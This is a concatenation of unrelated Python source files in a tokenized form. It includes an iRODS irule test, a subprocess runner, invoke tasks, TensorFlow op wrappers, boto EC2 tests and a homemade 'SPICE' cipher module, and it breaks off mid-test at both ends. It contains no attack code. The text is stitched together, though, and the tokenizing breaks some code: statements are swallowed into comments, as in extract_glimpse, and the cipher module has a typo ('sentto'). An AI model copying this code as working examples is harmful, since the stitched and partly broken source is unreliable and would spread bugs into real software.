'ruleExecOut'])<line_sep>self.assertEqual(rc 0)<line_sep>self.assertIn("[1][2]" stdout)<line_sep>stdout,stderr,rc=self.admin.run_icommand(['irule' 'writeLine("stdout","[*a]")' '*a=1%badInput' 'ruleExecOut'])<line_sep>self.assertNotIn("[1]" stdout)<line_sep>self.assertIn("badInput format error" stderr)<line_sep>self.assertNotEqual(rc 0)<block_end><block_end>
<import_from_stmt>. streams<import_stmt>logging<import_stmt>subprocess<import_stmt>sys<import_stmt>time<line_sep>log=logging.getLogger("openproblems")<def_stmt>format_error_timeout process timeout stream<block_start>"""Format subprocess output on timeout."""<line_sep><return>"{}\nTimed out after {} s\n\n{}".format(" ".join(process.args) timeout streams.NonBlockingStreamReader(stream).read().decode("utf-8") )<block_end><def_stmt>_format_error process stream<block_start>"""Format subprocess output."""<line_sep><return>"{}\nReturn code {}\n\n{}".format(" ".join(process.args) process.returncode stream.decode("utf-8"))<block_end><def_stmt>format_error_stderr process<block_start>"""Format subprocess output from stderr."""<line_sep><return>_format_error(process process.stderr)<block_end><def_stmt>format_error_stdout process<block_start>"""Format subprocess output from stdout."""<line_sep><return>_format_error(process process.stdout)<block_end><def_stmt>git_file_age filename<block_start>"""Get the age of a file's last git commit."""<line_sep>git_age=(run(["git" "log" "-1" '--format="%ad"' "--date=unix" "--" filename] return_stdout=<true> ).strip().replace('"' ""))<if_stmt>git_age<eq>""<block_start><return>0<block_end><else_stmt><block_start><return>int(git_age)<block_end><block_end><def_stmt>_run_failed process error_raises format_error<block_start><raise>error_raises(format_error(process))<block_end><def_stmt>run command shell=<false> print_stdout=<false> return_stdout=<false> return_code=<false> error_raises=AssertionError format_error=<none> timeout=3600 <block_start>"""Run subprocess. Parameters ---------- command : list of str shell : bool Run command in a new shell print_stdout : bool Print subprocess stdout to sys.stdout return_stdout : bool Return subprocess stdout return_code : bool Return subprocess exit code error_raises : Exception Which exception to raise on failure format_error : callable Function to call to generate error message. If None, chooses from `format_error_stderr` and `format_error_stdout` automatically. """<if_stmt>return_stdout<and>print_stdout<block_start><raise>NotImplementedError<block_end><elif_stmt>return_stdout<block_start>stderr=subprocess.PIPE<if_stmt>format_error<is><none><block_start>format_error=format_error_stderr<block_end><block_end><else_stmt><block_start>stderr=subprocess.STDOUT<if_stmt>format_error<is><none><block_start>format_error=format_error_stdout<block_end><block_end>log.debug("Running subprocess: {}".format(command))<line_sep>p=subprocess.Popen(command shell=shell stdout=subprocess.PIPE stderr=stderr)<if_stmt>timeout<is><not><none><block_start>runtime=0<if_stmt>p.poll()<is><none><block_start>time.sleep(1)<line_sep>runtime<augadd>1<block_end><if_stmt>runtime<g>timeout<block_start><raise>RuntimeError(format_error_timeout(p timeout p.stderr<if>stderr<is>subprocess.PIPE<else>p.stdout))<block_end><block_end>log.debug("Awaiting subprocess completion")<if_stmt>print_stdout<block_start><while_stmt><true><block_start>output=p.stdout.readline().decode("utf-8")<if_stmt>output<eq>""<and>p.poll()<is><not><none><block_start><break><block_end><if_stmt>output<block_start>print(output.strip())<line_sep>sys.stdout.flush()<block_end><block_end><block_end><else_stmt><block_start>p.wait()<block_end>log.debug("Subprocess complete")<line_sep>p.stdout,p.stderr=p.communicate()<line_sep>output=[]<if_stmt>return_stdout<block_start>output.append(p.stdout.decode("utf-8"))<block_end><if_stmt>return_code<block_start>output.append(p.returncode)<block_end><if_stmt><not>return_code<and><not>p.returncode<eq>0<block_start>_run_failed(p error_raises format_error)<block_end><if_stmt>output<block_start><return>output[0]<if>len(output)<eq>1<else>tuple(output)<block_end><block_end>
<import_from_stmt>invoke run<import_from_stmt>invoke task<line_sep>@task<def_stmt>clean all=<false><block_start><if_stmt>all<block_start>flag="--all"<block_end><else_stmt><block_start>flag=""<block_end>run("python setup.py clean {}".format(flag))<block_end>@task<def_stmt>build docs=<false><block_start>run("python setup.py build")<if_stmt>docs<block_start>run("sphinx-build docs docs/_build")<block_end><block_end>@task<def_stmt>test <block_start>run("python setup.py test")<block_end>@task<def_stmt>lint <block_start>run("rst2html.py README.rst > /dev/null")<line_sep>run("flake8 registration")<line_sep>run("isort --recursive --check-only registration")<block_end>
<import_stmt>os<import_stmt>json<import_from_stmt>collections OrderedDict<import_stmt>numpy<as>np<import_stmt>tensorflow<as>tf<line_sep>cur_path=os.path.realpath(__file__)<line_sep>ROOT_PATH=os.path.dirname(cur_path)<line_sep># add any new ops under the following pose_to_heatmap_fn=tf.load_op_library(os.path.join(ROOT_PATH 'pose_to_heatmap.so')).pose_to_heatmap<line_sep>zero_out_channels_fn=tf.load_op_library(os.path.join(ROOT_PATH 'zero_out_channels.so')).zero_out_channels<line_sep>render_pose_fn=tf.load_op_library(os.path.join(ROOT_PATH 'render_pose.so')).render_pose<line_sep>render_objects_fn=tf.load_op_library(os.path.join(ROOT_PATH 'render_objects.so')).render_objects<def_stmt>pose_to_heatmap *args **kwargs<block_start><with_stmt>tf.variable_scope('pose_to_heatmap_pyWrapper')<block_start>pose_img,pose_valid=pose_to_heatmap_fn(*args **kwargs)<line_sep>out_channels=kwargs['out_channels']<line_sep>pose_img.set_shape((<none> <none> out_channels))<line_sep>pose_valid.set_shape((out_channels ))<line_sep>pose_img<augmul>255.0<line_sep>pose_img=tf.cast(pose_img tf.uint8)<block_end><return>pose_img pose_valid<block_end><def_stmt>zero_out_channels *args **kwargs<block_start><with_stmt>tf.variable_scope('zero_out_channels_pyWrapper')<block_start><return>zero_out_channels_fn(*args **kwargs)<block_end><block_end><def_stmt>render_pose *args **kwargs<block_start><with_stmt>tf.variable_scope('render_pose_pyWrapper')<block_start>out_channels=3<if_stmt>kwargs['out_type']<eq>'rgb'<block_start>kwargs['out_type']=1<line_sep>out_channels=3<block_end><elif_stmt>kwargs['out_type']<eq>'split-channel'<block_start>kwargs['out_type']=2<line_sep>out_channels=18# number of limbs <block_end>img=render_pose_fn(*args **kwargs)<line_sep>img<augmul>255.0<line_sep>img=tf.cast(img tf.uint8)<line_sep>img.set_shape((<none> <none> out_channels))<block_end><return>img<block_end># from render_pose.cc mpii_to_coco=OrderedDict([(9 0) (8 1) (12 2) (11 3) (10 4) (13 5) (14 6) (15 7) (2 8) (1 9) (0 10) (3 11) (4 12) (5 13) ])<def_stmt>read_json_pose_fn fpath<block_start><try_stmt><block_start><with_stmt>open(fpath 'r')<as>fin<block_start>data=json.load(fin)<block_end><block_end><except_stmt><block_start>print('Unable to open file {}'.format(fpath))<line_sep><return>-np.ones((16<times>3 )).astype('int64')<block_end>res=[]<for_stmt>body data['bodies']<block_start>mpii_joints=-np.ones((16 3))<line_sep>joints=np.array(body['joints'])<line_sep>joints=np.reshape(joints (-1 3))<line_sep>joints[joints[<ellipsis> :]<le>0]=-1<line_sep>mpii_joints[np.array(mpii_to_coco.keys()) :]=joints[np.array(mpii_to_coco.values()) :]<line_sep>res<augadd>mpii_joints.reshape((-1 )).tolist()<block_end>res=np.array(res).astype('int64')<line_sep><return>res<block_end><def_stmt>read_json_pose *args<block_start><return>tf.py_func(read_json_pose_fn args tf.int64)<block_end><def_stmt>render_objects *args **kwargs<block_start><with_stmt>tf.variable_scope('render_objects_pyWrapper')<block_start>img=render_objects_fn(*args **kwargs)<line_sep>img<augmul>255.0<line_sep>img=tf.cast(img tf.uint8)<line_sep>img.set_shape((<none> <none> kwargs['out_channels']))<block_end><return>img<block_end><def_stmt>extract_glimpse image pose_label orig_im_ht orig_im_wd out_side pad_ratio parts_keep# pose label is a [3x16xn,] vector # for now just take the first pose and crop out the human <block_start><with_stmt>tf.name_scope('ExtractGlimpse')<block_start>pose_label=pose_label[:16<times>3]<line_sep>pose_label=tf.reshape(pose_label [16 3])<if_stmt>len(parts_keep)<g>0<block_start>pose_label=tf.gather(pose_label parts_keep)<block_end><if_stmt>len(parts_keep)<eq>1# now only one point, but need at least two to make a crop region <block_start>delta=tf.to_int64([tf.to_float(tf.shape(image)[-2])<times>0.1 tf.to_float(tf.shape(image)[-3])<times>0.1 0])<line_sep>pose_label=tf.stack([pose_label[0]-delta pose_label[0]+delta])<block_end>pose_label_x=tf.to_float(pose_label[: 0])<times>tf.to_float(tf.shape(image)[-2])/tf.to_float(orig_im_wd)<line_sep>pose_label_y=tf.to_float(pose_label[: 1])<times>tf.to_float(tf.shape(image)[-3])/tf.to_float(orig_im_ht)<line_sep>pose_label=tf.stack([pose_label_y pose_label_x])<line_sep>mx_pts=tf.to_int32(tf.reduce_max(pose_label axis=1))<line_sep>mn_pts=tf.to_int32(tf.reduce_min(tf.where(tf.greater_equal(pose_label 0) pose_label tf.ones(pose_label.get_shape())<times>999999) axis=1))<line_sep>delta_0=tf.to_int32(tf.to_float((mx_pts[0]-mn_pts[0]))<times>pad_ratio)<line_sep>delta_1=tf.to_int32(tf.to_float((mx_pts[1]-mn_pts[1]))<times>pad_ratio)<line_sep>mx_pts=mx_pts+[delta_0 delta_1]<line_sep>mn_pts=mn_pts-[delta_0 delta_1]<line_sep>offset_ht=tf.maximum(mn_pts[0] 0)<line_sep>offset_wd=tf.maximum(mn_pts[1] 0)<line_sep>target_ht=tf.minimum(mx_pts[0]-offset_ht tf.shape(image)[-3]-offset_ht-1)<line_sep>target_wd=tf.minimum(mx_pts[1]-offset_wd tf.shape(image)[-2]-offset_wd-1)<line_sep># image = tf.Print(image, [offset_ht, offset_wd, target_ht, target_wd, # tf.shape(image)], "stuff:") image=tf.cond(tf.logical_and(tf.greater(mx_pts[1] mn_pts[1]) tf.greater(mx_pts[0] mn_pts[0])) <lambda>:tf.image.crop_to_bounding_box(image offset_ht offset_wd target_ht target_wd) <lambda>:image)<if_stmt>out_side<g>0<block_start>image=tf.image.resize_images(image [out_side out_side])<block_end><return>image<block_end><block_end><def_stmt>read_sparse_label_fn sparse_label nclasses<block_start>"""sparse_label is a string and return a 1D vector with the dense label """<line_sep>res=np.zeros((nclasses ) dtype='int32')<line_sep>res[np.array([int(el.split(':')[0])<for>el sparse_label.split(',')])]=np.array([int(el.split(':')[1])<for>el sparse_label.split(',')])<line_sep>res[res<l>0]=0# get rid of -1 label for now <return>res<block_end><def_stmt>read_sparse_label *args<block_start><return>tf.py_func(read_sparse_label_fn args tf.int32)<block_end>
<import_from_stmt>graphene.utils.get_unbound_function get_unbound_function<def_stmt>get_custom_resolver obj_type orm_field_name<block_start>""" Since `graphene` will call `resolve_<field_name>` on a field only if it does not have a `resolver`, we need to re-implement that logic here so users are able to override the default resolvers that we provide. """<line_sep>resolver=getattr(obj_type 'resolve_{}'.format(orm_field_name) <none>)<if_stmt>resolver<block_start><return>get_unbound_function(resolver)<block_end><return><none><block_end><def_stmt>get_attr_resolver obj_type model_attr<block_start>""" In order to support field renaming via `ORMField.model_attr`, we need to define resolver functions for each field. :param SQLAlchemyObjectType obj_type: :param str model_attr: the name of the SQLAlchemy attribute :rtype: Callable """<line_sep><return><lambda>root _info:getattr(root model_attr <none>)<block_end>
<import_stmt>unittest<import_stmt>headercvt_test_utils<as>util<class_stmt>TestHeadercvtFuncDecl(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>util.check_existence_of_headercvt()<block_end>@util.with_temp_wd<def_stmt>test_headercvt_funcdecl_accept_case self wd<block_start>util.kick_headercvt_and_get_results(wd """ void clSomeFunction(int, void *); """)<line_sep>self.assertTrue(util.compile_with(wd "clSomeFunction(10, <void*>0)"))<block_end>@util.with_temp_wd<def_stmt>test_headercvt_funcdecl_decline_case self wd<block_start>results=util.kick_headercvt_and_get_results(wd """ void SomeFunction(int, void *); """)<line_sep>self.assertTrue(<not>util.contains(results["func_decl"] "SomeFunction"))<line_sep>self.assertTrue(util.compile_with(wd ""))<block_end><block_end>
<import_from_stmt>tests.compat unittest<import_from_stmt>boto.ec2.connection EC2Connection<import_from_stmt>boto.ec2.blockdevicemapping BlockDeviceType BlockDeviceMapping<import_from_stmt>tests.compat OrderedDict<import_from_stmt>tests.unit AWSMockServiceTestCase<class_stmt>BlockDeviceTypeTests(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>self.block_device_type=BlockDeviceType()<block_end><def_stmt>check_that_attribute_has_been_set self name value attribute<block_start>self.block_device_type.endElement(name value <none>)<line_sep>self.assertEqual(getattr(self.block_device_type attribute) value)<block_end><def_stmt>test_endElement_sets_correct_attributes_with_values self<block_start><for_stmt>arguments [("volumeId" 1 "volume_id") ("virtualName" "some name" "ephemeral_name") ("snapshotId" 1 "snapshot_id") ("volumeSize" 1 "size") ("status" "some status" "status") ("attachTime" 1 "attach_time") ("somethingRandom" "somethingRandom" "somethingRandom")]<block_start>self.check_that_attribute_has_been_set(arguments[0] arguments[1] arguments[2])<block_end><block_end><def_stmt>test_endElement_with_name_NoDevice_value_true self<block_start>self.block_device_type.endElement("NoDevice" 'true' <none>)<line_sep>self.assertEqual(self.block_device_type.no_device <true>)<block_end><def_stmt>test_endElement_with_name_NoDevice_value_other self<block_start>self.block_device_type.endElement("NoDevice" 'something else' <none>)<line_sep>self.assertEqual(self.block_device_type.no_device <false>)<block_end><def_stmt>test_endElement_with_name_deleteOnTermination_value_true self<block_start>self.block_device_type.endElement("deleteOnTermination" "true" <none>)<line_sep>self.assertEqual(self.block_device_type.delete_on_termination <true>)<block_end><def_stmt>test_endElement_with_name_deleteOnTermination_value_other self<block_start>self.block_device_type.endElement("deleteOnTermination" 'something else' <none>)<line_sep>self.assertEqual(self.block_device_type.delete_on_termination <false>)<block_end><def_stmt>test_endElement_with_name_encrypted_value_true self<block_start>self.block_device_type.endElement("Encrypted" "true" <none>)<line_sep>self.assertEqual(self.block_device_type.encrypted <true>)<block_end><def_stmt>test_endElement_with_name_Encrypted_value_other self<block_start>self.block_device_type.endElement("Encrypted" 'something else' <none>)<line_sep>self.assertEqual(self.block_device_type.encrypted <false>)<block_end><block_end><class_stmt>BlockDeviceMappingTests(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>self.block_device_mapping=BlockDeviceMapping()<block_end><def_stmt>block_device_type_eq self b1 b2<block_start><if_stmt>isinstance(b1 BlockDeviceType)<and>isinstance(b2 BlockDeviceType)<block_start><return>all([b1.connection<eq>b2.connection b1.ephemeral_name<eq>b2.ephemeral_name b1.no_device<eq>b2.no_device b1.volume_id<eq>b2.volume_id b1.snapshot_id<eq>b2.snapshot_id b1.status<eq>b2.status b1.attach_time<eq>b2.attach_time b1.delete_on_termination<eq>b2.delete_on_termination b1.size<eq>b2.size b1.encrypted<eq>b2.encrypted])<block_end><block_end><def_stmt>test_startElement_with_name_ebs_sets_and_returns_current_value self<block_start>retval=self.block_device_mapping.startElement("ebs" <none> <none>)<assert_stmt>self.block_device_type_eq(retval BlockDeviceType(self.block_device_mapping))<block_end><def_stmt>test_startElement_with_name_virtualName_sets_and_returns_current_value self<block_start>retval=self.block_device_mapping.startElement("virtualName" <none> <none>)<assert_stmt>self.block_device_type_eq(retval BlockDeviceType(self.block_device_mapping))<block_end><def_stmt>test_endElement_with_name_device_sets_current_name_dev_null self<block_start>self.block_device_mapping.endElement("device" "/dev/null" <none>)<line_sep>self.assertEqual(self.block_device_mapping.current_name "/dev/null")<block_end><def_stmt>test_endElement_with_name_device_sets_current_name self<block_start>self.block_device_mapping.endElement("deviceName" "some device name" <none>)<line_sep>self.assertEqual(self.block_device_mapping.current_name "some device name")<block_end><def_stmt>test_endElement_with_name_item_sets_current_name_key_to_current_value self<block_start>self.block_device_mapping.current_name="some name"<line_sep>self.block_device_mapping.current_value="some value"<line_sep>self.block_device_mapping.endElement("item" "some item" <none>)<line_sep>self.assertEqual(self.block_device_mapping["some name"] "some value")<block_end><block_end><class_stmt>TestLaunchConfiguration(AWSMockServiceTestCase)<block_start>connection_class=EC2Connection<def_stmt>default_body self# This is a dummy response <block_start><return>b""" <DescribeLaunchConfigurationsResponse> </DescribeLaunchConfigurationsResponse> """<block_end><def_stmt>test_run_instances_block_device_mapping self# Same as the test in ``unit/ec2/autoscale/test_group.py:TestLaunchConfiguration``, # but with modified request parameters (due to a mismatch between EC2 & # Autoscaling). <block_start>self.set_http_response(status_code=200)<line_sep>dev_sdf=BlockDeviceType(snapshot_id='snap-12345')<line_sep>dev_sdg=BlockDeviceType(snapshot_id='snap-12346' delete_on_termination=<true> encrypted=<true>)<class_stmt>OrderedBlockDeviceMapping(OrderedDict BlockDeviceMapping)<block_start><pass><block_end>bdm=OrderedBlockDeviceMapping()<line_sep>bdm.update(OrderedDict((('/dev/sdf' dev_sdf) ('/dev/sdg' dev_sdg))))<line_sep>response=self.service_connection.run_instances(image_id='123456' instance_type='m1.large' security_groups=['group1' 'group2'] block_device_map=bdm)<line_sep>self.assert_request_parameters({'Action':'RunInstances' 'BlockDeviceMapping.1.DeviceName':'/dev/sdf' 'BlockDeviceMapping.1.Ebs.DeleteOnTermination':'false' 'BlockDeviceMapping.1.Ebs.SnapshotId':'snap-12345' 'BlockDeviceMapping.2.DeviceName':'/dev/sdg' 'BlockDeviceMapping.2.Ebs.DeleteOnTermination':'true' 'BlockDeviceMapping.2.Ebs.SnapshotId':'snap-12346' 'BlockDeviceMapping.2.Ebs.Encrypted':'true' 'ImageId':'123456' 'InstanceType':'m1.large' 'MaxCount':1 'MinCount':1 'SecurityGroup.1':'group1' 'SecurityGroup.2':'group2' } ignore_params_values=['Version' 'AWSAccessKeyId' 'SignatureMethod' 'SignatureVersion' 'Timestamp'])<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>unittest.main()<block_end>
'''Module that implements SPICE. This module provides access to a standardized implementation of SPICE (Stephen's Power-Inspired, Computerized Encryption).'''<line_sep>################################################################################ __version__='$Revision: 0 $'<line_sep>__date__='April 19, 2008'<line_sep>__author__='Stephen "Zero" Chappell <<EMAIL>>'<line_sep>__credits__='''\ <NAME>, for testing code that led to this module. <NAME>, for contributing to the random module. <NAME>, for adding support for two core generators.'''<line_sep>################################################################################ <import_stmt>random<as>_random<import_stmt>sys<as>_sys<line_sep>################################################################################ <def_stmt>crypt_major <block_start>'Create a new Major Key.'<line_sep><return>''.join(map(chr _crypt.sample(xrange(256) 256)))<block_end><def_stmt>crypt_minor <block_start>'Create a new Minor Key.'<line_sep>sample=_crypt.sample(range(4)<times>64 256)<line_sep>array=[]<for_stmt>index xrange(64)<block_start>bits_12=sample[index<times>4]<lshift>6<line_sep>bits_34=sample[index<times>4+1]<lshift>4<line_sep>bits_56=sample[index<times>4+2]<lshift>2<line_sep>bits_78=sample[index<times>4+3]<line_sep>array.append(bits_12+bits_34+bits_56+bits_78)<block_end><return>''.join(map(chr array))<block_end>################################################################################ <def_stmt>named_major name<block_start>'Create a named Major Key.'<line_sep>_namer.seed(name)<line_sep><return>''.join(map(chr _namer.sample(xrange(256) 256)))<block_end><def_stmt>named_minor name<block_start>'Create a named Minor Key.'<line_sep>_namer.seed(name)<line_sep>sample=_namer.sample(range(4)<times>64 256)<line_sep>array=[]<for_stmt>index xrange(64)<block_start>bits_12=sample[index<times>4]<lshift>6<line_sep>bits_34=sample[index<times>4+1]<lshift>4<line_sep>bits_56=sample[index<times>4+2]<lshift>2<line_sep>bits_78=sample[index<times>4+3]<line_sep>array.append(bits_12+bits_34+bits_56+bits_78)<block_end><return>''.join(map(chr array))<block_end>################################################################################ <def_stmt>encode_string string major minor<block_start>'Return an encrypted string.'<assert_stmt>isinstance(string str)<line_sep>_check_major(major)<line_sep>_check_minor(minor)<line_sep>map_1=_encode_map_1(major)<line_sep>map_2=_encode_map_2(minor)<line_sep><return>_encode(string map_1 map_2)<block_end><def_stmt>decode_string string major minor<block_start>'Return a decrypted string.'<assert_stmt>isinstance(string str)<and>len(string)%4<eq>0<line_sep>_check_major(major)<line_sep>_check_minor(minor)<line_sep>map_1=_decode_map_1(minor)<line_sep>map_2=_decode_map_2(major)<line_sep><return>_decode(string map_1 map_2)<block_end>################################################################################ <def_stmt>encode_file source destination major minor<block_start>'Encrypt a file from source to destination.'<line_sep>_check_major(major)<line_sep>_check_minor(minor)<line_sep>map_1=_encode_map_1(major)<line_sep>map_2=_encode_map_2(minor)<line_sep>string=source.read(2<power>20/5)<while_stmt>string<block_start>destination.write(_encode(string map_1 map_2))<line_sep>string=source.read(2<power>20/5)<block_end><block_end><def_stmt>decode_file source destination major minor<block_start>'Decrypt a file from source to destination.'<line_sep>_check_major(major)<line_sep>_check_minor(minor)<line_sep>map_1=_decode_map_1(minor)<line_sep>map_2=_decode_map_2(major)<line_sep>string=source.read(2<power>20/5<times>4)<while_stmt>string<block_start>tail_len=len(string)%4<if_stmt>tail_len<eq>0<block_start>destination.write(_decode(string map_1 map_2))<line_sep>string=source.read(2<power>20/5<times>4)<block_end><else_stmt><block_start>destination.write(_decode(string[:-tail_len] map_1 map_2))<line_sep><return>string[-tail_len:]<block_end><block_end><return>''<block_end>################################################################################ <class_stmt>File_Crypt<block_start>'File_Crypt(major, minor, name, mode) -> File_Crypt'<def_stmt>__init__ self major minor name mode<block_start>'Initialize the File_Crypt object.'<line_sep>_check_major(major)<line_sep>_check_minor(minor)<line_sep>self.__em1=_encode_map_1(major)<line_sep>self.__em2=_encode_map_2(minor)<line_sep>self.__dm1=_decode_map_1(minor)<line_sep>self.__dm2=_decode_map_2(major)<assert_stmt>len(mode)<eq>1<and>mode<in>'raw'<line_sep>self.__file=open(name mode+'b' 0)<line_sep>self.tail=''<block_end><def_stmt>read self size=-1<block_start>'Read and decrypt from file.'<line_sep>string=self.__file.read(size<times>4)<line_sep>tail_len=len(string)%4<if_stmt>tail_len<block_start>self.tail=string[-tail_len:]<line_sep><return>_decode(string[:-tail_len] self.__dm1 self.__dm2)<block_end><else_stmt><block_start><return>_decode(string self.__dm1 self.__dm2)<block_end><block_end><def_stmt>write self string<block_start>'Encrypt and write to file.'<line_sep>self.__file.write(_encode(string self.__em1 self.__em2))<block_end><def_stmt>seek self offset whence=0<block_start>'Seek to virtual positon in file.'<line_sep>self.__file.seek(offset<times>4 whence)<line_sep>offset=self.__file.tell()/4<line_sep>self.__file.seek(offset<times>4)<block_end><def_stmt>tell self<block_start>'Return the virtual position in file.'<line_sep><return>self.__file.tell()/4<block_end><def_stmt>close self<block_start>'Close the File_Crypt object.'<line_sep>self.__file.close()<block_end><block_end>################################################################################ <class_stmt>Socket_Crypt<block_start>'Socket_Crypt(major, minor, socket) -> Socket_Crypt'<def_stmt>__init__ self major minor socket<block_start>'Initialize the Socket_Crypt object.'<line_sep>_check_major(major)<line_sep>_check_minor(minor)<line_sep>self.__em1=_encode_map_1(major)<line_sep>self.__em2=_encode_map_2(minor)<line_sep>self.__dm1=_decode_map_1(minor)<line_sep>self.__dm2=_decode_map_2(major)<line_sep>self.__major=major<line_sep>self.__minor=minor<line_sep>self.__socket=socket<line_sep>self.__tail=''<line_sep>self.__tails={}<block_end><def_stmt>accept self<block_start>'Return a new Socket_Crypt and address.'<line_sep>conn,address=self.__socket.accept()<line_sep><return>Socket_Crypt(self.__major self.__minor conn) address<block_end><def_stmt>recv self size flags=0<block_start>'Receive and decrypt off socket.'<line_sep>string=self.__tail+self.__socket.recv(size<times>4 flags)<line_sep>tail_len=len(string)%4<if_stmt>tail_len<block_start>self.__tail=string[-tail_len:]<line_sep><return>_decode(string[:-tail_len] self.__dm1 self.__dm2)<block_end><else_stmt><block_start>self.__tail=''<line_sep><return>_decode(string self.__dm1 self.__dm2)<block_end><block_end><def_stmt>recvfrom self size flags=0<block_start>'Receive datagram and decrypt off socket.'<line_sep>string,address=self.__socket.recvfrom(size<times>4 flags)<line_sep>string=self.__tails.get(address '')+string<line_sep>tail_len=len(string)%4<if_stmt>tail_len<block_start>self.__tails[address]=string[-tail_len:]<line_sep>string=_decode(string[:-tail_len] self.__dm1 self.__dm2)<line_sep><return>string address<block_end><else_stmt><block_start><if_stmt>address<in>self.__tails<block_start><del_stmt>self.__tails[address]<block_end>string=_decode(string self.__dm1 self.__dm2)<line_sep><return>string address<block_end><block_end><def_stmt>send self string flags=0<block_start>'Encrypt and send on socket.'<line_sep>string=_encode(string self.__em1 self.__em2)<line_sep>sent=self.__socket.send(string flags)<line_sep>offset=sent%4<if_stmt>offset<block_start>string=string[sent:][:4-offset]<line_sep>sent<augadd>len(string)<while_stmt>string<block_start>string=string[self.__socket.send(string flags):]<block_end><block_end><return>sent/4<block_end><def_stmt>sendall self string flags=0<block_start>'Encrypt and send all on socket.'<line_sep>string=_encode(string self.__em1 self.__em2)<line_sep><return>self.__socket.sendall(string flags)<block_end><def_stmt>sendto self string address flags=0<block_start>'Encrypt and send datagram on socket.'<line_sep>string=_encode(string self.__em1 self.__em2)<line_sep>sent=self.__socket.sendto(string flags address)<line_sep>offset=sent%4<if_stmt>offset<block_start>string=string[sent:][:4-offset]<line_sep>sent<augadd>len(string)<while_stmt>string<block_start>string=string[self.socket.sentto(string flags address):]<block_end><block_end><return>sent/4<block_end><def_stmt>makefile self mode='r' bufsize=-1<block_start>'Return a file-like object.'<line_sep><return>self<block_end><def_stmt>read self size=-1<block_start>'Read and decrypt from socket.'<if_stmt>size<l>0<block_start>cache=''<while_stmt><true><block_start>temp=self.recv(2<power>10)<if_stmt>temp<block_start>cache<augadd>temp<block_end><else_stmt><block_start><return>cache<block_end><block_end><block_end><else_stmt><block_start><return>self.recv(size)<block_end><block_end><def_stmt>readline self size=-1<block_start>'Dummy attribute for cPickle.'<line_sep><raise>NotImplementedError<block_end><def_stmt>write self string<block_start>'Encrypt and write to socket.'<line_sep>self.sendall(string)<block_end><block_end>################################################################################ <class_stmt>String_Crypt<block_start>'String_Crypt(major, minor) -> String_Crypt'<def_stmt>__init__ self major minor<block_start>'Initialize the String_Crypt object.'<line_sep>_check_major(major)<line_sep>_check_minor(minor)<line_sep>self.__em1=_encode_map_1(major)<line_sep>self.__em2=_encode_map_2(minor)<line_sep>self.__dm1=_decode_map_1(minor)<line_sep>self.__dm2=_decode_map_2(major)<block_end><def_stmt>encode self string<block_start>'Return an encrypted string.'<assert_stmt>isinstance(string str)<line_sep><return>_encode(string self.__em1 self.__em2)<block_end><def_stmt>decode self string<block_start>'Return a decrypted string.'<assert_stmt>isinstance(string str)<and>len(string)%4<eq>0<line_sep><return>_decode(string self.__dm1 self.__dm2)<block_end><block_end>################################################################################ _crypt=_random.SystemRandom()<line_sep>_namer=_random.Random()<line_sep>################################################################################ <def_stmt>_check_major key<block_start>'Private module function.'<assert_stmt>isinstance(key str)<and>len(key)<eq>256<for_stmt>character map(chr xrange(256))<block_start><assert_stmt>character<in>key<block_end><block_end><def_stmt>_check_minor key<block_start>'Private module function.'<assert_stmt>isinstance(key str)<and>len(key)<eq>64<line_sep>indexs=[]<for_stmt>byte map(ord key)<block_start><for_stmt>shift xrange(6 -2 -2)<block_start>indexs.append((byte<rshift>shift)&3)<block_end><block_end><for_stmt>index xrange(4)<block_start><assert_stmt>indexs.count(index)<eq>64<block_end><block_end><def_stmt>_encode_map_1 major<block_start>'Private module function.'<line_sep><return>map(ord major)<block_end><def_stmt>_encode_map_2 minor<block_start>'Private module function.'<line_sep>map_2=[[] [] [] []]<line_sep>array=[]<for_stmt>byte map(ord minor)<block_start><for_stmt>shift xrange(6 -2 -2)<block_start>array.append((byte<rshift>shift)&3)<block_end><block_end><for_stmt>byte,index enumerate(array)<block_start>map_2[index].append(chr(byte))<block_end><return>map_2<block_end><def_stmt>_decode_map_1 minor<block_start>'Private module function.'<line_sep>map_1=[]<for_stmt>byte map(ord minor)<block_start><for_stmt>shift xrange(6 -2 -2)<block_start>map_1.append((byte<rshift>shift)&3)<block_end><block_end><return>map_1<block_end><def_stmt>_decode_map_2 major<block_start>'Private module function.'<line_sep>map_2=[<none>]<times>256<for_stmt>byte,index enumerate(map(ord major))<block_start>map_2[index]=chr(byte)<block_end><return>map_2<block_end><def_stmt>_encode string map_1 map_2<block_start>'Private module function.'<line_sep>cache=''<for_stmt>character string<block_start>byte=map_1[ord(character)]<for_stmt>shift xrange(6 -2 -2)<block_start>cache<augadd>map_2[(byte<rshift>shift)&3][_crypt.randrange(64)]<block_end><block_end><return>cache<block_end><def_stmt>_decode string map_1 map_2<block_start>'Private module function.'<line_sep>cache=''<line_sep>iterator=iter(string)<for_stmt>byte iterator<block_start>bits_12=map_1[ord(byte)]<lshift>6<line_sep>bits_34=map_1[ord(iterator.next())]<lshift>4<line_sep>bits_56=map_1[ord(iterator.next())]<lshift>2<line_sep>bits_78=map_1[ord(iterator.next())]<line_sep>cache<augadd>map_2[bits_12+bits_34+bits_56+bits_78]<block_end><return>cache<block_end>################################################################################ <if_stmt>__name__<eq>'__main__'<block_start>_sys.stdout.write('Content-Type: text/plain\n\n')<line_sep>_sys.stdout.write(file(_sys.argv[0]).read())<block_end>
<import_stmt>numpy<as>np<import_stmt>unittest<import_from_stmt>laika.gps_time GPSTime<import_from_stmt>laika AstroDog<line_sep>gps_times_list=[[1950 415621.0] [1895 455457.0] [1885 443787.0]]<line_sep>svIds=['G01' 'G31' 'R08']<line_sep>gps_times=[GPSTime(*gps_time_list)<for>gps_time_list gps_times_list]<class_stmt>TestAstroDog(unittest.TestCase)<block_start>''' def test_nav_vs_orbit_now(self): dog_orbit = AstroDog(pull_orbit=True) dog_nav = AstroDog(pull_orbit=False) gps_time = GPSTime.from_datetime(datetime.utcnow()) - SECS_IN_DAY*2 for svId in svIds: sat_info_nav = dog_nav.get_sat_info(svId, gps_time) sat_info_orbit = dog_orbit.get_sat_info(svId, gps_time) np.testing.assert_allclose(sat_info_nav[0], sat_info_orbit[0], rtol=0, atol=5) np.testing.assert_allclose(sat_info_nav[1], sat_info_orbit[1], rtol=0, atol=.1) np.testing.assert_allclose(sat_info_nav[2], sat_info_orbit[2], rtol=0, atol=1e-7) np.testing.assert_allclose(sat_info_nav[3], sat_info_orbit[3], rtol=0, atol=1e-11) '''<def_stmt>test_nav_vs_orbit__old 